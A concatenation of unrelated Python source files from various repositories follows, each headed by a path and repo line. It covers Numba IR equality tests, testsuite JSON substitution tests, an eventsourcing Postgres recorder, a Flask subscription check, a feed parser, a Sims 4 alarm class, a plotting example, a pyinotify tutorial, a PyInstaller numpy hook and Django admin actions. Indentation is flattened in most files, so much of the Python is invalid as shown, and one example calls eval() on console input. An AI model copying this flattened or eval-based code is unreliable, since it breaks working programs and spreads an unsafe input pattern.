more_orange = local.define('orange', loc=ir.Loc(filename=filename,
line=5))
self.assertIs(top.get('orange'), orange)
        self.assertIsNot(local.get('orange'), orange)
self.assertIs(local.get('orange'), more_orange)
try:
local.define('orange', loc=ir.Loc(filename=filename, line=5))
except ir.RedefinedError:
pass
else:
self.fail("Expecting an %s" % ir.RedefinedError)
class CheckEquality(unittest.TestCase):
var_a = ir.Var(None, 'a', ir.unknown_loc)
var_b = ir.Var(None, 'b', ir.unknown_loc)
var_c = ir.Var(None, 'c', ir.unknown_loc)
var_d = ir.Var(None, 'd', ir.unknown_loc)
var_e = ir.Var(None, 'e', ir.unknown_loc)
loc1 = ir.Loc('mock', 1, 0)
loc2 = ir.Loc('mock', 2, 0)
loc3 = ir.Loc('mock', 3, 0)
def check(self, base, same=[], different=[]):
for s in same:
self.assertTrue(base == s)
for d in different:
self.assertTrue(base != d)
class TestIRMeta(CheckEquality):
"""
Tests IR node meta, like Loc and Scope
"""
def test_loc(self):
a = ir.Loc('file', 1, 0)
b = ir.Loc('file', 1, 0)
c = ir.Loc('pile', 1, 0)
d = ir.Loc('file', 2, 0)
e = ir.Loc('file', 1, 1)
self.check(a, same=[b,], different=[c, d, e])
f = ir.Loc('file', 1, 0, maybe_decorator=False)
g = ir.Loc('file', 1, 0, maybe_decorator=True)
self.check(a, same=[f, g])
def test_scope(self):
parent1 = ir.Scope(None, self.loc1)
parent2 = ir.Scope(None, self.loc1)
parent3 = ir.Scope(None, self.loc2)
self.check(parent1, same=[parent2, parent3,])
a = ir.Scope(parent1, self.loc1)
b = ir.Scope(parent1, self.loc1)
c = ir.Scope(parent1, self.loc2)
d = ir.Scope(parent3, self.loc1)
self.check(a, same=[b, c, d])
# parent1 and parent2 are equal, so children referring to either parent
# should be equal
e = ir.Scope(parent2, self.loc1)
self.check(a, same=[e,])
class TestIRNodes(CheckEquality):
"""
Tests IR nodes
"""
def test_terminator(self):
# terminator base class inst should always be equal
t1 = ir.Terminator()
t2 = ir.Terminator()
self.check(t1, same=[t2])
def test_jump(self):
a = ir.Jump(1, self.loc1)
b = ir.Jump(1, self.loc1)
c = ir.Jump(1, self.loc2)
d = ir.Jump(2, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_return(self):
a = ir.Return(self.var_a, self.loc1)
b = ir.Return(self.var_a, self.loc1)
c = ir.Return(self.var_a, self.loc2)
d = ir.Return(self.var_b, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_raise(self):
a = ir.Raise(self.var_a, self.loc1)
b = ir.Raise(self.var_a, self.loc1)
c = ir.Raise(self.var_a, self.loc2)
d = ir.Raise(self.var_b, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_staticraise(self):
a = ir.StaticRaise(AssertionError, None, self.loc1)
b = ir.StaticRaise(AssertionError, None, self.loc1)
c = ir.StaticRaise(AssertionError, None, self.loc2)
e = ir.StaticRaise(AssertionError, ("str",), self.loc1)
d = ir.StaticRaise(RuntimeError, None, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_branch(self):
a = ir.Branch(self.var_a, 1, 2, self.loc1)
b = ir.Branch(self.var_a, 1, 2, self.loc1)
c = ir.Branch(self.var_a, 1, 2, self.loc2)
d = ir.Branch(self.var_b, 1, 2, self.loc1)
e = ir.Branch(self.var_a, 2, 2, self.loc1)
f = ir.Branch(self.var_a, 1, 3, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_expr(self):
a = ir.Expr('some_op', self.loc1)
b = ir.Expr('some_op', self.loc1)
c = ir.Expr('some_op', self.loc2)
d = ir.Expr('some_other_op', self.loc1)
self.check(a, same=[b, c], different=[d])
def test_setitem(self):
a = ir.SetItem(self.var_a, self.var_b, self.var_c, self.loc1)
b = ir.SetItem(self.var_a, self.var_b, self.var_c, self.loc1)
c = ir.SetItem(self.var_a, self.var_b, self.var_c, self.loc2)
d = ir.SetItem(self.var_d, self.var_b, self.var_c, self.loc1)
e = ir.SetItem(self.var_a, self.var_d, self.var_c, self.loc1)
f = ir.SetItem(self.var_a, self.var_b, self.var_d, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_staticsetitem(self):
a = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_c, self.loc1)
b = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_c, self.loc1)
c = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_c, self.loc2)
d = ir.StaticSetItem(self.var_d, 1, self.var_b, self.var_c, self.loc1)
e = ir.StaticSetItem(self.var_a, 2, self.var_b, self.var_c, self.loc1)
f = ir.StaticSetItem(self.var_a, 1, self.var_d, self.var_c, self.loc1)
g = ir.StaticSetItem(self.var_a, 1, self.var_b, self.var_d, self.loc1)
self.check(a, same=[b, c], different=[d, e, f, g])
def test_delitem(self):
a = ir.DelItem(self.var_a, self.var_b, self.loc1)
b = ir.DelItem(self.var_a, self.var_b, self.loc1)
c = ir.DelItem(self.var_a, self.var_b, self.loc2)
d = ir.DelItem(self.var_c, self.var_b, self.loc1)
e = ir.DelItem(self.var_a, self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_del(self):
a = ir.Del(self.var_a.name, self.loc1)
b = ir.Del(self.var_a.name, self.loc1)
c = ir.Del(self.var_a.name, self.loc2)
d = ir.Del(self.var_b.name, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_setattr(self):
a = ir.SetAttr(self.var_a, 'foo', self.var_b, self.loc1)
b = ir.SetAttr(self.var_a, 'foo', self.var_b, self.loc1)
c = ir.SetAttr(self.var_a, 'foo', self.var_b, self.loc2)
d = ir.SetAttr(self.var_c, 'foo', self.var_b, self.loc1)
e = ir.SetAttr(self.var_a, 'bar', self.var_b, self.loc1)
f = ir.SetAttr(self.var_a, 'foo', self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_delattr(self):
a = ir.DelAttr(self.var_a, 'foo', self.loc1)
b = ir.DelAttr(self.var_a, 'foo', self.loc1)
c = ir.DelAttr(self.var_a, 'foo', self.loc2)
d = ir.DelAttr(self.var_c, 'foo', self.loc1)
e = ir.DelAttr(self.var_a, 'bar', self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_assign(self):
a = ir.Assign(self.var_a, self.var_b, self.loc1)
b = ir.Assign(self.var_a, self.var_b, self.loc1)
c = ir.Assign(self.var_a, self.var_b, self.loc2)
d = ir.Assign(self.var_c, self.var_b, self.loc1)
e = ir.Assign(self.var_a, self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_print(self):
a = ir.Print((self.var_a,), self.var_b, self.loc1)
b = ir.Print((self.var_a,), self.var_b, self.loc1)
c = ir.Print((self.var_a,), self.var_b, self.loc2)
d = ir.Print((self.var_c,), self.var_b, self.loc1)
e = ir.Print((self.var_a,), self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_storemap(self):
a = ir.StoreMap(self.var_a, self.var_b, self.var_c, self.loc1)
b = ir.StoreMap(self.var_a, self.var_b, self.var_c, self.loc1)
c = ir.StoreMap(self.var_a, self.var_b, self.var_c, self.loc2)
d = ir.StoreMap(self.var_d, self.var_b, self.var_c, self.loc1)
e = ir.StoreMap(self.var_a, self.var_d, self.var_c, self.loc1)
f = ir.StoreMap(self.var_a, self.var_b, self.var_d, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_yield(self):
a = ir.Yield(self.var_a, self.loc1, 0)
b = ir.Yield(self.var_a, self.loc1, 0)
c = ir.Yield(self.var_a, self.loc2, 0)
d = ir.Yield(self.var_b, self.loc1, 0)
e = ir.Yield(self.var_a, self.loc1, 1)
self.check(a, same=[b, c], different=[d, e])
def test_enterwith(self):
a = ir.EnterWith(self.var_a, 0, 1, self.loc1)
b = ir.EnterWith(self.var_a, 0, 1, self.loc1)
c = ir.EnterWith(self.var_a, 0, 1, self.loc2)
d = ir.EnterWith(self.var_b, 0, 1, self.loc1)
e = ir.EnterWith(self.var_a, 1, 1, self.loc1)
f = ir.EnterWith(self.var_a, 0, 2, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_arg(self):
a = ir.Arg('foo', 0, self.loc1)
b = ir.Arg('foo', 0, self.loc1)
c = ir.Arg('foo', 0, self.loc2)
d = ir.Arg('bar', 0, self.loc1)
e = ir.Arg('foo', 1, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_const(self):
a = ir.Const(1, self.loc1)
b = ir.Const(1, self.loc1)
c = ir.Const(1, self.loc2)
d = ir.Const(2, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_global(self):
a = ir.Global('foo', 0, self.loc1)
b = ir.Global('foo', 0, self.loc1)
c = ir.Global('foo', 0, self.loc2)
d = ir.Global('bar', 0, self.loc1)
e = ir.Global('foo', 1, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_var(self):
a = ir.Var(None, 'foo', self.loc1)
b = ir.Var(None, 'foo', self.loc1)
c = ir.Var(None, 'foo', self.loc2)
d = ir.Var(ir.Scope(None, ir.unknown_loc), 'foo', self.loc1)
e = ir.Var(None, 'bar', self.loc1)
self.check(a, same=[b, c, d], different=[e])
def test_intrinsic(self):
a = ir.Intrinsic('foo', 'bar', (0,), self.loc1)
b = ir.Intrinsic('foo', 'bar', (0,), self.loc1)
c = ir.Intrinsic('foo', 'bar', (0,), self.loc2)
d = ir.Intrinsic('baz', 'bar', (0,), self.loc1)
e = ir.Intrinsic('foo', 'baz', (0,), self.loc1)
f = ir.Intrinsic('foo', 'bar', (1,), self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_undefinedtype(self):
a = ir.UndefinedType()
b = ir.UndefinedType()
self.check(a, same=[b])
def test_loop(self):
a = ir.Loop(1, 3)
b = ir.Loop(1, 3)
c = ir.Loop(2, 3)
d = ir.Loop(1, 4)
self.check(a, same=[b], different=[c, d])
def test_with(self):
a = ir.With(1, 3)
b = ir.With(1, 3)
c = ir.With(2, 3)
d = ir.With(1, 4)
self.check(a, same=[b], different=[c, d])
# used later
_GLOBAL = 1234
class TestIRCompounds(CheckEquality):
"""
Tests IR concepts that have state
"""
def test_varmap(self):
a = ir.VarMap()
a.define(self.var_a, 'foo')
a.define(self.var_b, 'bar')
b = ir.VarMap()
b.define(self.var_a, 'foo')
b.define(self.var_b, 'bar')
c = ir.VarMap()
c.define(self.var_a, 'foo')
c.define(self.var_c, 'bar')
self.check(a, same=[b], different=[c])
def test_block(self):
def gen_block():
parent = ir.Scope(None, self.loc1)
tmp = ir.Block(parent, self.loc2)
assign1 = ir.Assign(self.var_a, self.var_b, self.loc3)
assign2 = ir.Assign(self.var_a, self.var_c, self.loc3)
assign3 = ir.Assign(self.var_c, self.var_b, self.loc3)
tmp.append(assign1)
tmp.append(assign2)
tmp.append(assign3)
return tmp
a = gen_block()
b = gen_block()
c = gen_block().append(ir.Assign(self.var_a, self.var_b, self.loc3))
self.check(a, same=[b], different=[c])
def test_functionir(self):
# this creates a function full of all sorts of things to ensure the IR
# is pretty involved, it then compares two instances of the compiled
# function IR to check the IR is the same invariant of objects, and then
# a tiny mutation is made to the IR in the second function and detection
# of this change is checked.
def gen():
_FREEVAR = 0xCAFE
def foo(a, b, c=12, d=1j, e=None):
f = a + b
a += _FREEVAR
g = np.zeros(c, dtype=np.complex64)
h = f + g
i = 1j / d
if np.abs(i) > 0:
k = h / i
l = np.arange(1, c + 1)
with objmode():
print(e, k)
m = np.sqrt(l - g)
if np.abs(m[0]) < 1:
n = 0
for o in range(a):
n += 0
if np.abs(n) < 3:
break
n += m[2]
p = g / l
q = []
for r in range(len(p)):
q.append(p[r])
if r > 4 + 1:
with objmode(s='intp', t='complex128'):
s = 123
t = 5
if s > 122:
t += s
t += q[0] + _GLOBAL
return f + o + r + t + r + a + n
return foo
x = gen()
y = gen()
x_ir = compiler.run_frontend(x)
y_ir = compiler.run_frontend(y)
self.assertTrue(x_ir.equal_ir(y_ir))
def check_diffstr(string, pointing_at=[]):
lines = string.splitlines()
for item in pointing_at:
for l in lines:
if l.startswith('->'):
if item in l:
break
else:
raise AssertionError("Could not find %s " % item)
self.assertIn("IR is considered equivalent", x_ir.diff_str(y_ir))
# minor mutation, simply switch branch targets on last branch
for label in reversed(list(y_ir.blocks.keys())):
blk = y_ir.blocks[label]
if isinstance(blk.body[-1], ir.Branch):
ref = blk.body[-1]
ref.truebr, ref.falsebr = ref.falsebr, ref.truebr
break
check_diffstr(x_ir.diff_str(y_ir), ['branch'])
z = gen()
self.assertFalse(x_ir.equal_ir(y_ir))
z_ir = compiler.run_frontend(z)
change_set = set()
for label in reversed(list(z_ir.blocks.keys())):
blk = z_ir.blocks[label]
ref = blk.body[:-1]
idx = None
for i in range(len(ref)):
# look for two adjacent Del
if (isinstance(ref[i], ir.Del) and
isinstance(ref[i + 1], ir.Del)):
idx = i
break
if idx is not None:
b = blk.body
change_set.add(str(b[idx + 1]))
change_set.add(str(b[idx]))
b[idx], b[idx + 1] = b[idx + 1], b[idx]
break
self.assertFalse(x_ir.equal_ir(z_ir))
self.assertEqual(len(change_set), 2)
for item in change_set:
self.assertTrue(item.startswith('del '))
check_diffstr(x_ir.diff_str(z_ir), change_set)
def foo(a, b):
c = a * 2
d = c + b
e = np.sqrt(d)
return e
def bar(a, b): # same as foo
c = a * 2
d = c + b
e = np.sqrt(d)
return e
def baz(a, b):
c = a * 2
d = b + c
e = np.sqrt(d + 1)
return e
foo_ir = compiler.run_frontend(foo)
bar_ir = compiler.run_frontend(bar)
self.assertTrue(foo_ir.equal_ir(bar_ir))
self.assertIn("IR is considered equivalent", foo_ir.diff_str(bar_ir))
baz_ir = compiler.run_frontend(baz)
self.assertFalse(foo_ir.equal_ir(baz_ir))
tmp = foo_ir.diff_str(baz_ir)
self.assertIn("Other block contains more statements", tmp)
check_diffstr(tmp, ["c + b", "b + c"])
if __name__ == '__main__':
unittest.main()
|
tests/test_json_util.py | okutane/yandex-taxi-testsuite | 128 | 18785 | import dateutil
import pytest
from testsuite.plugins import mockserver
from testsuite.utils import json_util
NOW = dateutil.parser.parse('2019-09-19-13:04:00.000000')
MOCKSERVER_INFO = mockserver.MockserverInfo(
'localhost', 123, 'http://localhost:123/', None,
)
MOCKSERVER_SSL_INFO = mockserver.MockserverInfo(
'localhost',
456,
'https://localhost:456/',
mockserver.SslInfo('/some_dir/cert.cert', '/some_dir/cert.key'),
)
@pytest.mark.parametrize(
'json_input,expected_result',
[
( # simple list
[{'some_date': {'$dateDiff': 0}}, 'regular_element'], # json_input
[{'some_date': NOW}, 'regular_element'], # expected_result
),
( # simple dict
{ # json_input
'some_date': {'$dateDiff': 0},
'regular_key': 'regular_value',
},
            {'some_date': NOW, 'regular_key': 'regular_value'}, # expected_result
),
( # nested list and dict
{ # json_input
'regular_root_key': 'regular_root_value',
'root_date': {'$dateDiff': 0},
'parent_key': {
'nested_date': {'$dateDiff': 0},
'nested_list': [
'regular_element1',
{'$dateDiff': 0},
{'$dateDiff': 0},
'regular_element2',
],
},
},
{ # expected_result
'regular_root_key': 'regular_root_value',
'root_date': NOW,
'parent_key': {
'nested_date': NOW,
'nested_list': [
'regular_element1',
NOW,
NOW,
'regular_element2',
],
},
},
),
],
)
def test_substitute_now(json_input, expected_result):
result = json_util.substitute(json_input, now=NOW)
assert result == expected_result
@pytest.mark.parametrize(
'json_input,expected_result',
[
(
({'client_url': {'$mockserver': '/path'}}),
({'client_url': 'http://localhost:123/path'}),
),
(
({'client_url': {'$mockserver': '/path', '$schema': False}}),
({'client_url': 'localhost:123/path'}),
),
],
)
def test_substitute_mockserver(json_input, expected_result):
result = json_util.substitute(json_input, mockserver=MOCKSERVER_INFO)
assert result == expected_result
@pytest.mark.parametrize(
'json_input,expected_result',
[
(
({'client_url': {'$mockserver_https': '/path'}}),
({'client_url': 'https://localhost:456/path'}),
),
(
({'client_url': {'$mockserver_https': '/path', '$schema': False}}),
({'client_url': 'localhost:456/path'}),
),
],
)
def test_substitute_mockserver_https(json_input, expected_result):
result = json_util.substitute(
json_input, mockserver_https=MOCKSERVER_SSL_INFO,
)
assert result == expected_result
|
eventsourcing/examples/searchabletimestamps/postgres.py | ParikhKadam/eventsourcing | 107 | 18789 | <reponame>ParikhKadam/eventsourcing
from datetime import datetime
from typing import Any, List, Optional, Sequence, Tuple, cast
from uuid import UUID
from eventsourcing.domain import Aggregate
from eventsourcing.examples.searchabletimestamps.persistence import (
SearchableTimestampsRecorder,
)
from eventsourcing.persistence import ApplicationRecorder, StoredEvent
from eventsourcing.postgres import (
Factory,
PostgresApplicationRecorder,
PostgresConnection,
PostgresCursor,
PostgresDatastore,
)
class SearchableTimestampsApplicationRecorder(
SearchableTimestampsRecorder, PostgresApplicationRecorder
):
def __init__(
self,
datastore: PostgresDatastore,
events_table_name: str = "stored_events",
event_timestamps_table_name: str = "event_timestamps",
):
self.check_table_name_length(event_timestamps_table_name, datastore.schema)
self.event_timestamps_table_name = event_timestamps_table_name
super().__init__(datastore, events_table_name)
self.insert_event_timestamp_statement = (
f"INSERT INTO {self.event_timestamps_table_name} VALUES ($1, $2, $3)"
)
self.insert_event_timestamp_statement_name = (
f"insert_{event_timestamps_table_name}".replace(".", "_")
)
self.select_event_timestamp_statement = (
f"SELECT originator_version FROM {self.event_timestamps_table_name} WHERE "
f"originator_id = $1 AND "
f"timestamp <= $2 "
"ORDER BY originator_version DESC "
"LIMIT 1"
)
self.select_event_timestamp_statement_name = (
f"select_{event_timestamps_table_name}".replace(".", "_")
)
def construct_create_table_statements(self) -> List[str]:
statements = super().construct_create_table_statements()
statements.append(
"CREATE TABLE IF NOT EXISTS "
f"{self.event_timestamps_table_name} ("
"originator_id uuid NOT NULL, "
"timestamp timestamp with time zone, "
"originator_version bigint NOT NULL, "
"PRIMARY KEY "
"(originator_id, timestamp))"
)
return statements
def _prepare_insert_events(self, conn: PostgresConnection) -> None:
super()._prepare_insert_events(conn)
self._prepare(
conn,
self.insert_event_timestamp_statement_name,
self.insert_event_timestamp_statement,
)
def _insert_events(
self,
c: PostgresCursor,
stored_events: List[StoredEvent],
**kwargs: Any,
) -> Optional[Sequence[int]]:
notification_ids = super()._insert_events(c, stored_events, **kwargs)
# Insert event timestamps.
event_timestamps_data = cast(
List[Tuple[UUID, datetime, int]], kwargs.get("event_timestamps_data")
)
for event_timestamp_data in event_timestamps_data:
statement_alias = self.statement_name_aliases[
self.insert_event_timestamp_statement_name
]
c.execute(f"EXECUTE {statement_alias}(%s, %s, %s)", event_timestamp_data)
return notification_ids
def get_version_at_timestamp(
self, originator_id: UUID, timestamp: datetime
) -> Optional[int]:
with self.datastore.get_connection() as conn:
self._prepare(
conn,
self.select_event_timestamp_statement_name,
self.select_event_timestamp_statement,
)
with conn.transaction(commit=False) as curs:
statement_alias = self.statement_name_aliases[
self.select_event_timestamp_statement_name
]
curs.execute(
f"EXECUTE {statement_alias}(%s, %s)", [originator_id, timestamp]
)
for row in curs.fetchall():
return row["originator_version"]
else:
return Aggregate.INITIAL_VERSION - 1
class SearchableTimestampsInfrastructureFactory(Factory):
def application_recorder(self) -> ApplicationRecorder:
prefix = (self.datastore.schema + ".") if self.datastore.schema else ""
prefix += self.env.name.lower() or "stored"
events_table_name = prefix + "_events"
event_timestamps_table_name = prefix + "_timestamps"
recorder = SearchableTimestampsApplicationRecorder(
datastore=self.datastore,
events_table_name=events_table_name,
event_timestamps_table_name=event_timestamps_table_name,
)
recorder.create_table()
return recorder
del Factory
|
app/blogging/routes.py | Sjors/patron | 114 | 18819 | from app.blogging import bp
from datetime import datetime
from flask import flash, redirect, url_for
from flask_login import current_user
@bp.before_request
def protect():
'''
    Registers a new function on the Flask-Blogging Blueprint that protects
    updates so that they are only viewable by paid subscribers.
'''
if current_user.is_authenticated:
if datetime.today() <= current_user.expiration:
return None
else:
flash('You must have a paid-up subscription \
to view updates.', 'warning')
return redirect(url_for('main.support'))
else:
flash('Please login to view updates.', 'warning')
return redirect(url_for('auth.login'))
|
WebMirror/management/rss_parser_funcs/feed_parse_extractKaedesan721TumblrCom.py | fake-name/ReadableWebProxy | 193 | 18837 | <gh_stars>100-1000
def extractKaedesan721TumblrCom(item):
'''
Parser for 'kaedesan721.tumblr.com'
'''
bad_tags = [
'FanArt',
"htr asks",
'Spanish translations',
'htr anime','my thoughts',
'Cats',
'answered',
'ask meme',
'relay convos',
'translation related post',
'nightmare fuel',
'htr manga',
'memes',
'htrweek',
'Video Games',
'Animation',
'replies',
'jazz',
'Music',
]
if any([bad in item['tags'] for bad in bad_tags]):
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
if "my translations" in item['tags']:
tagmap = [
('<NAME>', '<NAME>', 'translated'),
('<NAME>', '<NAME>', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
Scripts/sims4communitylib/classes/time/common_alarm_handle.py | ColonolNutty/Sims4CommunityLibrary | 118 | 18893 | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
import os
from sims4.commands import Command, CommandType, CheatOutput
from sims4communitylib.utils.common_time_utils import CommonTimeUtils
from typing import Any, Callable
ON_RTD = os.environ.get('READTHEDOCS', None) == 'True'
if not ON_RTD:
from scheduling import Timeline
from alarms import AlarmHandle
from date_and_time import DateAndTime, TimeSpan
else:
# noinspection PyMissingOrEmptyDocstring
class AlarmHandle:
def cancel(self):
pass
# noinspection PyMissingOrEmptyDocstring
class DateAndTime:
pass
# noinspection PyMissingOrEmptyDocstring
class TimeSpan:
pass
# noinspection PyMissingOrEmptyDocstring
class Timeline:
pass
class CommonAlarmHandle(AlarmHandle):
"""A custom alarm handle that keeps track of when it is slated to trigger for the first time."""
def __init__(
self,
owner: Any,
on_alarm_triggered_callback: Callable[['CommonAlarmHandle'], None],
timeline: Timeline,
when: DateAndTime,
should_repeat: bool=False,
time_until_repeat: TimeSpan=None,
accurate_repeat: bool=True,
persist_across_zone_loads: bool=False
):
self.started_at_date_and_time = when
super().__init__(
owner,
on_alarm_triggered_callback,
timeline,
when,
repeating=should_repeat,
repeat_interval=time_until_repeat,
accurate_repeat=accurate_repeat,
cross_zone=persist_across_zone_loads
)
if not ON_RTD:
@Command('s4clib.print_current_time', command_type=CommandType.Live)
def _s4clib_print_current_time(_connection: int=None):
output = CheatOutput(_connection)
output('Current time')
output('Hour {} Minute {}'.format(CommonTimeUtils.get_current_date_and_time().hour(), CommonTimeUtils.get_current_date_and_time().minute()))
output('Abs Hour {} Abs Minute {}'.format(CommonTimeUtils.get_current_date_and_time().absolute_hours(), CommonTimeUtils.get_current_date_and_time().absolute_minutes()))
|
examples/make_sphere_graphic.py | itamar-dw/spherecluster | 186 | 18907 | import sys
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # NOQA
import seaborn # NOQA
from spherecluster import sample_vMF
plt.ion()
n_clusters = 3
mus = np.random.randn(3, n_clusters)
mus, r = np.linalg.qr(mus, mode='reduced')
kappas = [15, 15, 15]
num_points_per_class = 250
Xs = []
for nn in range(n_clusters):
new_X = sample_vMF(mus[nn], kappas[nn], num_points_per_class)
Xs.append(new_X.T)
fig = plt.figure(figsize=(8, 6))
ax = fig.add_subplot(
1, 1, 1, aspect='equal', projection='3d',
adjustable='box-forced', xlim=[-1.1, 1.1], ylim=[-1.1, 1.1],
zlim=[-1.1, 1.1]
)
colors = ['b', 'r', 'g']
for nn in range(n_clusters):
ax.scatter(Xs[nn][0, :], Xs[nn][1, :], Xs[nn][2, :], c=colors[nn])
ax.set_aspect('equal')
plt.axis('off')
plt.show()
def r_input(val=None):
val = val or ''
if sys.version_info[0] >= 3:
return eval(input(val))
return raw_input(val)
r_input()
|
python2/examples/tutorial_threadednotifier.py | openEuler-BaseService/pyinotify | 1,509 | 18922 | # ThreadedNotifier example from tutorial
#
# See: http://github.com/seb-m/pyinotify/wiki/Tutorial
#
import pyinotify
wm = pyinotify.WatchManager() # Watch Manager
mask = pyinotify.IN_DELETE | pyinotify.IN_CREATE # watched events
class EventHandler(pyinotify.ProcessEvent):
def process_IN_CREATE(self, event):
print "Creating:", event.pathname
def process_IN_DELETE(self, event):
print "Removing:", event.pathname
#log.setLevel(10)
notifier = pyinotify.ThreadedNotifier(wm, EventHandler())
notifier.start()
wdd = wm.add_watch('/tmp', mask, rec=True)
wm.rm_watch(wdd.values())
notifier.stop()
|
PyInstaller/hooks/hook-numpy.py | mathiascode/pyinstaller | 9,267 | 18942 | <reponame>mathiascode/pyinstaller
#!/usr/bin/env python3
# --- Copyright Disclaimer ---
#
# In order to support PyInstaller with numpy<1.20.0 this file will be duplicated for a short period inside
# PyInstaller's repository [1]. However this file is the intellectual property of the NumPy team and is
# under the terms and conditions outlined in their repository [2].
#
# .. refs:
#
# [1] PyInstaller: https://github.com/pyinstaller/pyinstaller/
# [2] NumPy's license: https://github.com/numpy/numpy/blob/master/LICENSE.txt
#
"""
This hook should collect all binary files and any hidden modules that numpy needs.
Our (somewhat inadequate) docs for writing PyInstaller hooks are kept here:
https://pyinstaller.readthedocs.io/en/stable/hooks.html
PyInstaller has a lot of NumPy users so we consider maintaining this hook a high priority.
Feel free to @mention either bwoodsend or Legorooj on Github for help keeping it working.
"""
from PyInstaller.compat import is_conda, is_pure_conda
from PyInstaller.utils.hooks import collect_dynamic_libs
# Collect all DLLs inside numpy's installation folder, dump them into built app's root.
binaries = collect_dynamic_libs("numpy", ".")
# If using Conda without any non-conda virtual environment manager:
if is_pure_conda:
    # Assume we are running NumPy from Conda-forge and collect its DLLs from the communal Conda bin directory. DLLs from
# NumPy's dependencies must also be collected to capture MKL, OpenBlas, OpenMP, etc.
from PyInstaller.utils.hooks import conda_support
datas = conda_support.collect_dynamic_libs("numpy", dependencies=True)
# Submodules PyInstaller cannot detect (probably because they are only imported by extension modules, which PyInstaller
# cannot read).
hiddenimports = ['numpy.core._dtype_ctypes']
if is_conda:
hiddenimports.append("six")
# Remove testing and building code and packages that are referenced throughout NumPy but are not really dependencies.
excludedimports = [
"scipy",
"pytest",
"nose",
"distutils",
"f2py",
"setuptools",
"numpy.f2py",
"numpy.distutils",
]
|
test_proj/blog/admin.py | Ivan-Feofanov/django-inline-actions | 204 | 18943 | from django.contrib import admin, messages
from django.shortcuts import render
from django.utils.translation import gettext_lazy as _
from inline_actions.actions import DefaultActionsMixin, ViewAction
from inline_actions.admin import InlineActionsMixin, InlineActionsModelAdminMixin
from . import forms
from .models import Article, Author, AuthorProxy
class UnPublishActionsMixin(object):
def get_inline_actions(self, request, obj=None):
actions = super(UnPublishActionsMixin, self).get_inline_actions(request, obj)
if obj:
if obj.status == Article.DRAFT:
actions.append('publish')
elif obj.status == Article.PUBLISHED:
actions.append('unpublish')
return actions
def publish(self, request, obj, parent_obj=None):
obj.status = Article.PUBLISHED
obj.save()
messages.info(request, _("Article published."))
publish.short_description = _("Publish") # type: ignore
def unpublish(self, request, obj, parent_obj=None):
obj.status = Article.DRAFT
obj.save()
messages.info(request, _("Article unpublished."))
unpublish.short_description = _("Unpublish") # type: ignore
class TogglePublishActionsMixin(object):
def get_inline_actions(self, request, obj=None):
actions = super(TogglePublishActionsMixin, self).get_inline_actions(
request=request, obj=obj
)
actions.append('toggle_publish')
return actions
def toggle_publish(self, request, obj, parent_obj=None):
if obj.status == Article.DRAFT:
obj.status = Article.PUBLISHED
else:
obj.status = Article.DRAFT
obj.save()
status = 'unpublished' if obj.status == Article.DRAFT else 'published'
messages.info(request, _("Article {}.".format(status)))
def get_toggle_publish_label(self, obj):
label = 'publish' if obj.status == Article.DRAFT else 'unpublish'
return 'Toggle {}'.format(label)
def get_toggle_publish_css(self, obj):
return 'button object-tools' if obj.status == Article.DRAFT else 'default'
class ChangeTitleActionsMixin(object):
def get_inline_actions(self, request, obj=None):
actions = super(ChangeTitleActionsMixin, self).get_inline_actions(request, obj)
actions.append('change_title')
return actions
def change_title(self, request, obj, parent_obj=None):
        # explicitly check whether the submit button has been pressed
if '_save' in request.POST:
form = forms.ChangeTitleForm(request.POST, instance=obj)
form.save()
return None # return back to list view
elif '_back' in request.POST:
return None # return back to list view
else:
form = forms.ChangeTitleForm(instance=obj)
return render(request, 'change_title.html', context={'form': form})
class ArticleInline(
DefaultActionsMixin,
UnPublishActionsMixin,
TogglePublishActionsMixin,
InlineActionsMixin,
admin.TabularInline,
):
model = Article
fields = (
'title',
'status',
)
readonly_fields = (
'title',
'status',
)
def has_add_permission(self, request, obj=None):
return False
class ArticleNoopInline(InlineActionsMixin, admin.TabularInline):
model = Article
fields = (
'title',
'status',
)
readonly_fields = (
'title',
'status',
)
def get_inline_actions(self, request, obj=None):
actions = super(ArticleNoopInline, self).get_inline_actions(
request=request, obj=obj
)
actions.append('noop_action')
return actions
def noop_action(self, request, obj, parent_obj=None):
pass
@admin.register(AuthorProxy)
class AuthorMultipleInlinesAdmin(InlineActionsModelAdminMixin, admin.ModelAdmin):
inlines = [ArticleInline, ArticleNoopInline]
list_display = ('name',)
inline_actions = None
@admin.register(Author)
class AuthorAdmin(InlineActionsModelAdminMixin, admin.ModelAdmin):
inlines = [ArticleInline]
list_display = ('name',)
inline_actions = None
@admin.register(Article)
class ArticleAdmin(
UnPublishActionsMixin,
TogglePublishActionsMixin,
ChangeTitleActionsMixin,
ViewAction,
InlineActionsModelAdminMixin,
admin.ModelAdmin,
):
list_display = ('title', 'status', 'author')
|
